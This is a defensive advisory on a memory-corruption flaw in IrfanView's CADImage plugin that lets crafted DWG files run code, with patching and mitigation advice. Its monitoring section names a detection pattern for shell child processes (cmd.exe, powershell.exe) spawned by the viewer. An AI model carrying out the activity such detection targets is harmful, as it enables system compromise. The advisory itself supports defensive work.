A high-severity vulnerability has been discovered in the IrfanView image viewer, specifically within its CADImage plugin. An attacker could exploit this flaw by tricking a user into opening a specially crafted DWG drawing file, which could allow the attacker to execute arbitrary code and take full control of the affected system. This presents a significant risk of data theft, malware infection, or further network compromise.

The vulnerability is a memory corruption flaw within the CADImage plugin used by IrfanView. It occurs during the parsing of malformed Drawing (DWG) files. An attacker can create a specially crafted DWG file that, when opened by a user in a vulnerable version of IrfanView, triggers a memory error (such as a buffer overflow). Successful exploitation can corrupt the application's memory, leading to the execution of arbitrary code with the same privileges as the logged-in user.

This vulnerability is rated as High severity with a CVSS score of 7.8. Successful exploitation could lead to a complete compromise of the user's workstation. The primary business impact includes the potential for data exfiltration of sensitive corporate or personal information, installation of persistent malware such as ransomware or spyware, and the use of the compromised machine as a foothold to move laterally across the corporate network. Organizations where employees use IrfanView to handle files from external sources (e.g., email attachments, web downloads) are at a heightened risk of a targeted attack.

Immediate Action: Apply the security patches released by the vendor to all systems with IrfanView installed. Prioritize patching on systems that are internet-facing or used by employees who regularly handle external documents. Following patching, monitor for any exploitation attempts and review application and system access logs for suspicious activity related to IrfanView or DWG file handling.

Proactive Monitoring: Implement monitoring to detect potential exploitation attempts. This should include watching for IrfanView application crashes in system event logs, as well as Endpoint Detection and Response (EDR) alerts for suspicious child processes (e.g., cmd.exe, powershell.exe) being spawned by the IrfanView executable (i_view32.exe or i_view64.exe). Monitor network traffic for unusual outbound connections from workstations immediately after a DWG file has been opened.

Compensating Controls: If patching cannot be immediately deployed, consider the following compensating controls:

• User Awareness: Instruct users to not open DWG files from untrusted or unknown sources.
• File Association: Temporarily un-associate the .dwg file extension from the IrfanView application to prevent accidental opening.
• Application Control: Use tools like Windows Defender Application Control or AppLocker to prevent the IrfanView process from creating new executable child processes.

Public Exploit Available: False

Given the high severity (CVSS 7.8) and the potential for remote code execution, it is strongly recommended that all vulnerable instances of IrfanView be patched immediately. Although exploitation requires user interaction, this can be easily achieved through standard social engineering techniques like phishing emails. While this CVE is not currently on the CISA KEV list, its characteristics make it a prime target for future exploitation. Organizations must prioritize patching to prevent a potential system compromise.